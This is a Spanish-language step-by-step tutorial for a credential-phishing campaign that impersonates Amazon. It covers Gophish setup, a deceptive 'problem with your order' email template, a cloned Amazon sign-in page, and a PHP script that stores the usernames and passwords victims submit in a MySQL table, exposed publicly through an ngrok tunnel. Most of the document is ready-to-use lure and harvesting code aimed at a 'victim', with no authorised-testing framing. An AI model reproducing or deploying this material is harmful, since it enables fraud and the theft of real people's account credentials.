Phishing_techniques and results

Gophish [Configuracion]

Lo primero de todo tendremos que descargar la herramienta de Gophish y que cree el servidor donde se aloja la pagina web para poder empezar a configurarla...

URL (Gophish) =

Por lo que lo descargaremos de la siguiente manera...

git clone
cd gophish/
go build

Una vez instalado todo y construido, lo ejecutaremos de la siguiente manera...


Cuando se ejecute la aplicacion las credenciales se mostraran en la terminal para que puedas iniciar sesion a parte de que se abrira automaticamente el login, pero en tal caso de que no se abriera nos proporcionara la URL para poder ingresarla en internet...

level=info msg="Please login with the username admin and the password <PASSWORD>"

Sabremos que el usuario sera admin y la password cambiara dependiendo del usuario, el link sera el siguiente...


Cuando inicies sesion con las credenciales por defecto, te pedira que cambies la contraseña y una vez hecho eso, nos metera en la pagina para poder empezar a configurarla...

Lo primero que configuraremos sera la parte llamada como Email Templates y dentro del mismo crearemos uno nuevo donde pone [+] New Template para asi poder crear el email que va a ver el usuario cuando se le envie...

En la parte de Name: ponemos el nombre que queramos en mi caso le pondre GMAIL PHISHING, donde pone Envelope Sender: ponemos el email que queremos que se vea cuando le llegue al usuario paar que sea todo mas real, donde pone Subject: ponemos el titulo o la cabecera del correo que le va a llegar al usuario y por ultimo en la misma parte un poco mas abajo hay 2 opciones llamadas Text y HTML elegiremos HTML para poder programar el correo entero por asi decirlo, os dejo un ejemplo del codigo que programe y como se veria...


	<style type="text/css">.input_letter {
font-size: 17px;
font-weight: bold;

.line {
color: grey;
height: 0.1px;

.line_head {
color: orange;
height: 10px;
background-color: orange;
border: none;
margin-top: 0px;

.box {
background-color: rgba(220, 220, 220,0.45);
border-radius: 3px;
padding: 10px;
font-size: 12.5px;
color: rgb(130, 130, 130);

span.letter {
font-family: Verdana, Geneva, Thaoma, sans-serif;

body {
font-family: Verdana, Geneva, Thaoma, sans-serif;
color: black;
<hr class="line_head" />
<p><img src="" width="300" /></p>

<hr class="line" />
<p>Estimado/a cliente,<br />
<br />
Lamentamos informarle que ha habido un problema con uno de sus pedidos recientes en Amazon. Para resolver este problema y asegurarnos de que reciba su pedido a tiempo, necesitamos que confirme algunos detalles de su cuenta.<br />
<br />
Si no resuelve este problema, es posible que su pedido se retrase o sea cancelado. Agradecemos su pronta atenci&oacute;n a este asunto.<br />
<br />
Si tiene alguna pregunta o necesita asistencia adiccional, no dude en contactarnos a traves de nuestro servicio de atenci&oacute;n al cliente.<br />
<br />
Atentamente,<br />
<br />
Equipo de Atenci&oacute;n al Cliente Amazon.</p>

<p><a href="{{.URL}}"><input class="input_letter" style="background-color: orange; border: none; border-radius: 3px; padding: 15px 32px;" type="submit" value="Seguimiento de tu pedido" /></a></p>

<div class="box"><span class="letter">Si en el futuro prefieres no recibir correos electr&oacute;nicos de Amazon de este tipo, selecciona la exluci&oacute;n voluntaria <a href="{{.URL}}">aqu&iacute;</a></span><br />
<br />
<span class="letter">Referencia AKDFGD27DKIEHFU6-JDLJDJS423ILFPBNGS Amazon EU Sarl. Luxemburgo, Reg# B-1810102, 5 Rue Plaetis, L-23824 Luxemburgo. VAT # LU 2026781.</span><br />
<p><img src="" width="100" /></p>


Donde pone en el codigo {{.URL}} es donde sustituiremos eso por el link que nos proporcionara la herramienta ngrok pero eso mas adelante...

Una vez creado el correo lo guardaremos y nos iremos a la seccion de Sending Profiles le daremos a crear uno nuevo [+] New Profile donde pone Name: pondremos el nombre que queramos sera para nosotros identificarlo en mi caso le llamare PHISHING SMTP, donde pone SMTP From: le pondremos el correo donde esta configurado nuestro servidor SMTP o el que viene por defecto en nuestro correo creado de hotmail...

Ejemplo SMTP From:

SMTP From:

Donde pone Host: pondremos el identificador de nuestro servidor SMTP o el por defecto que viene en Microsoft...

Ejemplo Host:


Y por ultimo donde pone Username y Password pondremos en Username lo mismo que metimos en SMTP From y en Password la contraseña de ese correo...

Ejemplo Username y Password:


Password: secret123

Ahora nos dirigimos a la seccion de Landing Pages crearemos una pagina pero que no servira para nada, ya que no la utilizaremos pero la herramienta Gophish obliga a tener una, pero mas adelante ya crearemos una pagina en nuestro puerto local de apache2...

En mi caso a la pagina la llame test en la opcion Name: y la guardaremos [!] Aviso: esta pagina no va a servir para nada, es solo por que la herramienta lo pide...

Despues nos dirigimos en la parte de Users & Groups dentro del mismo crearemos uno donde pone [+] New Group, en la parte de Name: pondremos un nombre para identificarlo en mi caso lo llame Example_group, y en las casillas llamadas...

First Name: Example

Last Name: Test


Position: CEO

Estas opciones las estamos configurando para que cuando enviemos el correo aparezca con el nombre y apellidos a parte de la posicion laboral que va a ser visible por el usuario si se pusiera a buscar, por lo que lo tendremos que adaptar al tipo de phishing que estemos haciendo y por ultimo donde pone Email: pondremos el email con el que enviaremos el phishing (Nuestro email)...

Una vez configurado todo lo añadiremos [+] Add y lo guardaremos todo...

Ya por ultimo nos vamos a la seccion llamada Campaigns y le daremos a [+] New Campaign dentro de la configuracion lo configuraremos de la siguiente manera...

Donde pone Name: pondremos el nombre con el que lo queramos identificar en mi caso lo llamare test_phishing, en la parte de Email Template: pondremos el email que creamos anteriormente en mi caso lo llame GMAIL PHISHING, en la parte de Landing Page: pondremos el que llamamos test, donde pone URL: pondremos para todos lo mismo http://localhost, en la parte de Sending Profile: pondremos la configuracion del SMTP que creamos anteriormente en mi caso llamado PHISHING SMTP y por ultimo en la parte de Groups: seleccionaremos el grupo anteriormente creado llamado en mi caso test_group...

Como deberia de verse:

Una vez puesto todo lo anterior no guardaremos nada, le daremos en la opcion llamada Send Test Email y dentro de la misma se configurara de la siguiente forma...

First Name: Victim

Last Name: Test


Position: CEO

Lo importante de aqui es poner en la parte de Email: el email del usuario victima al que se lo queremos mandar, pero antes de hacerlo, crearemos la pagina web phishing desde nuestra terminal de la siguiente manera y ya retomaremos esta parte del envio...

Pagina Phishing [Configuracion apache2, mysql, ngrok, etc...]

Lo primero que haremos sera instalar apache2...

sudo apt install apache2

Pero no podremos iniciarlo con systemctl ya que por defecto se aloja en el puerto 80 y ese puerto ya esta cogido por un proceso de la herramienta Gophish por lo que cambiaremos de puerto a apache2 de la siguiente forma...

nano /etc/apache2/ports.conf

#Dentro del nano
Listen <PORT>

Ejemplo (PORT):

nano /etc/apache2/ports.conf

#Dentro del nano
# If you just change the port or add more ports here, you will likely also
# have to change the VirtualHost statement in
# /etc/apache2/sites-enabled/000-default.conf

Listen 7755

<IfModule ssl_module>
        Listen 443

<IfModule mod_gnutls.c>
        Listen 443

Lo guardamos y con eso ya habriamos cambiado el puerto del apache2, por lo que ahora lo iniciaremos...

systemctl start apache2
systemctl enable apache2

Con esto ya estaria en funcionamiento y establecido cada vez que se arranque el S.O. el apache2...

Por lo que nos dirigimos a la siguiente ubicacion para borrar los archivos creados por defecto del apache2...

cd /var/www/html/
rm *


rm /var/www/html/*

MySQL [Configuracion de captacion de credenciales]

Instalaremos y configuraremos una base de datos en mysql para que cuando inserte las credenciales en la pagina de phishing del login se envien automaticamente a la base de datos que crearemos en mysql...

systemctl start mysqld
systemctl enable mysqld

Una vez instalado mysql nos meteremos dentro del entorno para crear la base de datos con las credenciales por defecto de mysql...

mysql -u root -p

Nos pedira una contraseña, pero lo dejaremos vacio y le daremos a enter...

Una vez dentro haremos lo siguiente...

-- Crear base de datos --

CREATE DATABASE phishing_db;

-- Usar la base de datos --

USE phishing_db;

-- Crear tabla credentials --

CREATE TABLE credentials (
    username VARCHAR(255) NOT NULL,
    password VARCHAR(255) NOT NULL

Ahora configuraremos el usuario root para que no surja ningun problema a la hora de configurar el .php para que se escriban los datos en mysql...

-- Cambiar la contraseña del usuario root --

ALTER USER 'root'@'localhost' IDENTIFIED BY 'root';

-- Conceder todos los privilegios al usuario root --


-- Actualizar los privilegios --


Una vez configurado todo saldremos de la base de datos del entorno de mysql...


Configuracion de la pagina web phishing y captacion de datos en PHP

Nos vamos a la siguiente ubicacion para crear toda la estructura...

cd /var/www/html

Pagina Web phishing:

Lo llamaremos index.php para que sea lo primero que se vea cuando le redirija el link...

<!doctype html>

<html class="a-no-js" data-19ax5a9jf="dingo">



    <link rel="icon" href="" type="image/x-icon">

    <title dir="ltr">Iniciar sesión en Amazon</title>

    <link rel="stylesheet" href="|11Fd9tJOdtL.css,11tfezETfFL.css,31Q3id-QR0L.css,31U9HrBLKmL.css_.css?AUIClients/AmazonUI#us.not-trident" />

    <link rel="stylesheet" href="|31jdWD+JB+L.css,51a-Srr-vTL.css_.css?AUIClients/AuthenticationPortalAssets" />

    <link rel="stylesheet" href="" />



<body class="auth-no-skin ap-locale-es_ES a-m-us a-aui_72554-c a-aui_accordion_a11y_role_354025-c a-aui_killswitch_csa_logger_372963-c a-aui_pci_risk_banner_210084-c a-aui_preload_261698-c a-aui_rel_noreferrer_noopener_309527-c a-aui_template_weblab_cache_333406-c a-aui_tnr_v2_180836-c">


        window.ue && ue.count && ue.count('CSMLibrarySize', 18524)


    <div id="a-page">

        <script type="a-state" data-a-state="{&quot;key&quot;:&quot;a-wlab-states&quot;}">{}</script>

        <div class="a-section a-padding-medium auth-workflow">

            <div class="a-section a-spacing-none auth-navbar">

                <div class="a-section a-spacing-medium a-text-center">

                    <a class="a-link-nav-icon" href="/ref=ap_frn_logo">

                        <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>

                        <i class="a-icon a-icon-domain-es a-icon-domain" role="presentation"></i>




            <div id="authportal-center-section" class="a-section">

                <div id="authportal-main-section" class="a-section">

                    <div class="a-section a-spacing-base auth-pagelet-container">

                        <div class="a-section auth-pagelet-container">

                            <!-- Establecer variables de SSO de dominio cruzado para hacer llamadas Ajax al dominio central de identidad -->

                            <div class="a-section a-spacing-base">

                                <div class="a-section">

                                    <form name="signIn" method="post" novalidate action="process.php" class="a-spacing-none">

                                        <div class="a-section">

                                            <div class="a-box">

                                                <div class="a-box-inner a-padding-extra-large">

                                                    <h1 class="a-spacing-small">

                                                        Iniciar sesión


                                                    <!-- Elemento opcional de subencabezado -->

                                                    <div class="a-row a-spacing-base">

                                                        <label for="ap_email" class="a-form-label">

                                                            Dirección de e-mail o número de teléfono móvil


                                                        <input type="text" maxlength="128" id="username" autocomplete="webauthn" name="username" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field" aria-describedby="Indica tu dirección de e-mail o teléfono móvil" aria-required="true" /><br><br>

                                                        <div id="auth-email-missing-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" role="alert">

                                                            <div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i>

                                                                <div class="a-alert-content">

                                                                    Indica tu dirección de e-mail o teléfono móvil





                                                    <input type="hidden" name="create" value="0" />

                                                    <div class="a-section a-spacing-large">

                                                        <div class="a-row">

                                                            <div class="a-column a-span5">

                                                                <label for="ap_password" class="a-form-label">




                                                            <div class="a-column a-span7 a-text-right a-span-last">

                                                                <a id="auth-fpp-link-bottom" class="a-link-normal" href=";openid.pape.max_auth_age=0&amp;;webAuthnChallengeIdForAutofill=n87wpIzpvHZ-RFvxBYUoEw24O1NmT675%3AEU&amp;webAuthnGetParametersForAutofill=eyJycElkIjoiYW1hem9uLmVzIiwiY2hhbGxlbmdlIjoibjg3d3BJenB2SFotUkZ2eEJZVW9FdzI0TzFObVQ2NzUiLCJ0aW1lb3V0Ijo5MDAwMDAsImFsbG93Q3JlZGVudGlhbHMiOm51bGwsIm1lZGlhdGlvbiI6ImNvbmRpdGlvbmFsIiwidXNlclZlcmlmaWNhdGlvbiI6InByZWZlcnJlZCJ9&amp;language=es_ES&amp;pageId=amzn_retail_yourorders_es&amp;;prevRID=J8GEN1NJCTYY482HY48D&amp;openid.assoc_handle=amzn_retail_yourorders_es&amp;openid.mode=checkid_setup&amp;prepopulatedLoginId=&amp;failedSignInCount=0&amp;;">

                                                                    ¿Has olvidado la contraseña?




                                                        <input type="password" maxlength="1024" id="password" autocomplete="current-password" name="password" tabindex="2" class="a-input-text a-span12 auth-required-field" aria-describedby="Introduce tu contraseña" aria-required="true" /><br><br>

                                                        <div id="auth-password-missing-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" role="alert">

                                                            <div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i>

                                                                <div class="a-alert-content">

                                                                    Introduce tu contraseña





                                                    <div class="a-section a-spacing-extra-large">

                                                        <span class="a-button a-button-span12 a-button-primary auth-disable-button-on-submit"><span class="a-button-inner"><input id="signInSubmit" tabindex="5" class="a-button-input" type="submit" /><span class="a-button-text" aria-hidden="true">

                                                                    Iniciar sesión


                                                        <div id="legalTextRow" class="a-row a-spacing-top-medium a-size-small">

                                                            Al continuar, aceptas las <a href="/gp/help/customer/display.html/ref=ap_signin_notification_condition_of_use?ie=UTF8&amp;nodeId=200545940">Condiciones de uso y venta</a> de Amazon. Consulta nuestro <a href="/gp/help/customer/display.html/ref=ap_signin_notification_privacy_notice?ie=UTF8&amp;nodeId=200545460">Aviso de privacidad</a>, nuestro <a href="/gp/help/customer/display.html/?nodeId=201890250">Aviso sobre cookies</a> y nuestro <a href="/gp/help/customer/display.html?nodeId=201909150">Aviso sobre anuncios basados en intereses</a>.



                                                            function cf() {

                                                                if (typeof window.uet === 'function') {



                                                                if (window.embedNotification &&

                                                                    typeof window.embedNotification.onCF === 'function') {





                                                        <script type="text/javascript">



                                                        <div class="a-row a-spacing-top-medium">

                                                            <div class="a-section a-text-left">

                                                                <label for="auth-remember-me" class="a-form-label">

                                                                    <div data-a-input-name="rememberMe" class="a-checkbox"><label><input type="checkbox" name="rememberMe" value="true" /><i class="a-icon a-icon-checkbox"></i><span class="a-label a-checkbox-label">


                                                                                <span class="a-declarative" data-action="a-popover" data-csa-c-type="widget" data-csa-c-func-deps="aui-da-a-popover" data-a-popover="{&quot;closeButtonLabel&quot;:&quot;Cerrar&quot;,&quot;activate&quot;:&quot;onclick&quot;,&quot;header&quot;:&quot;Casilla \&quot;Recuérdame\&quot;&quot;,&quot;inlineContent&quot;:&quot;\u003cp&gt;Si seleccionas \&quot;Recuérdame\&quot;, se reduce el número de veces que se te pedirá que te identifiques en este dispositivo.\u003c\/p&gt;\n\u003cp&gt;Para mantener la seguridad de tu cuenta, utiliza esta opción sólo en tus dispositivos personales.\u003c\/p&gt;&quot;}">

                                                                                    <a id="remember_me_learn_more_link" href="javascript:void(0)" role="button" class="a-popover-trigger a-declarative">


                                                                                        <i class="a-icon a-icon-popover"></i></a>







                                                    <div class="a-divider a-divider-break">

                                                        <h5 aria-level="5">¿Eres nuevo en Amazon?</h5>


                                                    <span id="auth-create-account-link" class="a-button a-button-span12 a-button-base"><span class="a-button-inner"><a id="createAccountSubmit" href=";openid.pape.max_auth_age=0&amp;;webAuthnChallengeIdForAutofill=n87wpIzpvHZ-RFvxBYUoEw24O1NmT675%3AEU&amp;webAuthnGetParametersForAutofill=eyJycElkIjoiYW1hem9uLmVzIiwiY2hhbGxlbmdlIjoibjg3d3BJenB2SFotUkZ2eEJZVW9FdzI0TzFObVQ2NzUiLCJ0aW1lb3V0Ijo5MDAwMDAsImFsbG93Q3JlZGVudGlhbHMiOm51bGwsIm1lZGlhdGlvbiI6ImNvbmRpdGlvbmFsIiwidXNlclZlcmlmaWNhdGlvbiI6InByZWZlcnJlZCJ9&amp;language=es_ES&amp;pageId=amzn_retail_yourorders_es&amp;;prevRID=J8GEN1NJCTYY482HY48D&amp;openid.assoc_handle=amzn_retail_yourorders_es&amp;openid.mode=checkid_setup&amp;prepopulatedLoginId=&amp;failedSignInCount=0&amp;;" class="a-button-text">

                                                                Crea tu cuenta de Amazon











                <div id="right-2">


                <div class="a-section a-spacing-top-extra-large auth-footer">

                    <div class="a-divider a-divider-section">

                        <div class="a-divider-inner"></div>


                    <div class="a-section a-spacing-small a-text-center a-size-mini">

                        <span class="auth-footer-seperator"></span>



                            <li style="list-style-type: none; margin: 0; padding:0; display: inline-block;">

                                <a class="a-link-normal a-nowrap" target="_blank" rel="noopener" href="/gp/help/customer/display.html/ref=ap_desktop_footer_cou?ie=UTF8&amp;nodeId=200545940">

                                    Condiciones de uso


                                <span class="auth-footer-seperator"></span>


                            <li style="list-style-type: none; margin: 0; padding:0; display: inline-block;">

                                <a class="a-link-normal a-nowrap" target="_blank" rel="noopener" href="/gp/help/customer/display.html/ref=ap_desktop_footer_privacy_notice?ie=UTF8&amp;nodeId=200545460">

                                    Aviso de privacidad


                                <span class="auth-footer-seperator"></span>


                            <li style="list-style-type: none; margin: 0; padding:0; display: inline-block;">

                                <a class="a-link-normal a-nowrap" target="_blank" rel="noopener" href="/help">



                                <span class="auth-footer-seperator"></span>


                            <li style="list-style-type: none; margin: 0; padding:0; display: inline-block;">

                                <a class="a-link-normal a-nowrap" target="_blank" rel="noopener" href="/gp/help/customer/display.html/?nodeId=201890250">



                                <span class="auth-footer-seperator"></span>


                            <li style="list-style-type: none; margin: 0; padding:0; display: inline-block;">

                                <a class="a-link-normal a-nowrap" target="_blank" rel="noopener" href="/gp/help/customer/display.html/?nodeId=201909150">

                                    Publicidad basada en intereses


                                <span class="auth-footer-seperator"></span>




                    <div class="a-section a-spacing-none a-text-center">

                        <span class="a-size-mini a-color-secondary">

                            © 1996-2024,, Inc. o sus afiliados





            <div id="auth-external-javascript" class="auth-external-javascript" data-external-javascripts="">



                <img height="1" width="1" style='display:none;visibility:hidden;' src='//$uedata=s:%2Fap%2Fuedata%3Fnoscript%26id%3DJ8GEN1NJCTYY482HY48D:0' alt="" />



                window.ue && ue.count && ue.count('CSMLibrarySize', 48885)








Una vez tengamos creado el login y el formulario con el action="process.php" que le programamos para que cuando inicies sesion redirija a ese process.php que ahora crearemos, crearemos el process.php el cual sera el que capte las credenciales y las escriba en mysql a parte de que te redirija a la vez a una pagina de error de la siguiente forma...



// Configuración de la base de datos

$servername = "localhost";

$db_username = "root";

$db_password = "root";  // Contraseña actualizada

$dbname = "phishing_db";


// Crear conexión

$conn = new mysqli($servername, $db_username, $db_password, $dbname);


// Verificar conexión

if ($conn->connect_error) {

    die("Conexión fallida: " . $conn->connect_error);



// Obtener las credenciales del formulario

$user = $_POST['username'];

$pass = $_POST['password'];


// Validar que los datos no estén vacíos

if (empty($user) || empty($pass)) {

    die("Usuario o contraseña no proporcionados.");



// Preparar y ejecutar la consulta

$stmt = $conn->prepare("INSERT INTO credentials (username, password) VALUES (?, ?)");

if ($stmt === false) {

    die("Preparación de consulta fallida: " . $conn->error);



$stmt->bind_param("ss", $user, $pass);

if (!$stmt->execute()) {

    die("Ejecución de consulta fallida: " . $stmt->error);



// Cerrar la declaración y la conexión




// Redirigir a una página de error falso o una página legítima

header("Location: index_error.php");  // Cambia esta URL a una URL de error o de redirección legítima



Aqui configuramos ya el archivo con la base de datos en mysql para que se escriba en esa base de datos de esa tabla metiendose con el usuario root con la contraseña root y que te redirija al archivo index_error.php el cual crearemos ahora mismo...


Una vez estemos aqui ya se habrian escrito las credenciales en la base de datos, pero cuando le den a Iniciar sesión les llevara al verdadero login de la pagina oficial...

Pero esto estara en local por lo que solo nosotros podremos verlo, para ponerlo de forma publica tunelizando nuestro servidor local de apache2 a un dominio publico por asi decirlo lo haremos con la herramienta ngrok...

ngrok [Configuracion]


Primero lo descargaremos, seleccionaremos el S.O. acorde a donde se este configurando con la arquitectura correspondiente...

En la misma pagina crearemos una cuenta para tener una API Key, una vez creada la cuenta y descargado el archivo, descomprimiremos el archivo en la terminal...

tar -xvzf <FILE>.tgz

Esto nos dara el archivo ngrok sera el ejecutable que tunelizara el localhost:7755 ( en el respectivo puerto que lo configuramos de la siguiente manera con nuestra API Key...

URL (API Key) =

Aqui podremos ver nuestra API para poder hacer lo siguiente...

./ngrok authtoken <API Key>
./ngrok http 7755

Esto iniciara la tunelizacion del localhost proporcionando asi la URL a la que nos tenemos que conectar para poder visualizar que todo esta funcionando correctamente y la que tendremos que meter en el codigo del email de la herramienta Gophish...


En mi caso me proporciono pero por seguridad y que no les aparezca al usuario la interfaz de ngrok detallaremos dode quieres que se redirija al usuario de que archivo de la pagina, quedando de la siguiente forma...


Asi nos aseguramos que se muestre el index.php y esa URL es un ejemplo de lo que me salio a mi, pero puede ser distinta...

Una vez que tengamos la URL lo cambiaremos en Gophish en la seccion de Tempalte Email donde pone {{.URL}} lo sustituiremos por por lo que cuando den a un link les llevara al de nuestro localhost tunelizado por ngrok quedando de la siguiente manera...

	<style type="text/css">.input_letter {
font-size: 17px;
font-weight: bold;

.line {
color: grey;
height: 0.1px;

.line_head {
color: orange;
height: 10px;
background-color: orange;
border: none;
margin-top: 0px;

.box {
background-color: rgba(220, 220, 220,0.45);
border-radius: 3px;
padding: 10px;
font-size: 12.5px;
color: rgb(130, 130, 130);

span.letter {
font-family: Verdana, Geneva, Thaoma, sans-serif;

body {
font-family: Verdana, Geneva, Thaoma, sans-serif;
color: black;
<hr class="line_head" />
<p><img src="" width="300" /></p>

<hr class="line" />
<p>Estimado/a cliente,<br />
<br />
Lamentamos informarle que ha habido un problema con uno de sus pedidos recientes en Amazon. Para resolver este problema y asegurarnos de que reciba su pedido a tiempo, necesitamos que confirme algunos detalles de su cuenta.<br />
<br />
Si no resuelve este problema, es posible que su pedido se retrase o sea cancelado. Agradecemos su pronta atenci&oacute;n a este asunto.<br />
<br />
Si tiene alguna pregunta o necesita asistencia adiccional, no dude en contactarnos a traves de nuestro servicio de atenci&oacute;n al cliente.<br />
<br />
Atentamente,<br />
<br />
Equipo de Atenci&oacute;n al Cliente Amazon.</p>

<p><a href=""><input class="input_letter" style="background-color: orange; border: none; border-radius: 3px; padding: 15px 32px;" type="submit" value="Seguimiento de tu pedido" /></a></p>

<div class="box"><span class="letter">Si en el futuro prefieres no recibir correos electr&oacute;nicos de Amazon de este tipo, selecciona la exluci&oacute;n voluntaria <a href="">aqu&iacute;</a></span><br />
<br />
<span class="letter">Referencia AKDFGD27DKIEHFU6-JDLJDJS423ILFPBNGS Amazon EU Sarl. Luxemburgo, Reg# B-1810102, 5 Rue Plaetis, L-23824 Luxemburgo. VAT # LU 2026781.</span><br />
<p><img src="" width="100" /></p>

Lo guardamos y ya podremos enviarlo al usuario victima de la siguiente manera...

Volvemos por donde lo dejamos en la herramienta Gophish en la zona de Campaigns dejando la configuracion que mencione anteriormente y estando en la parte de Send Email pondremos el email del usuario victima y le daremos al boton de Send una vez hecho esto, ya le habria llegado al usuario y solo seria cuestion de esperar...

Si el usuario hubiera picado y hubiera introducido las credenciales en la pagina del login phishing lo veremos de la siguiente manera llendo a mysql y haciendo lo siguiente...

mysql -h localhost -u root -proot
USE phishing_db;
SELECT * FROM credentials;


| id | username | password |
|  1 | admin    | root     |
1 row in set (0.020 sec)

Y como veremos las credenciales fueron registradas perfectamente...

Last updated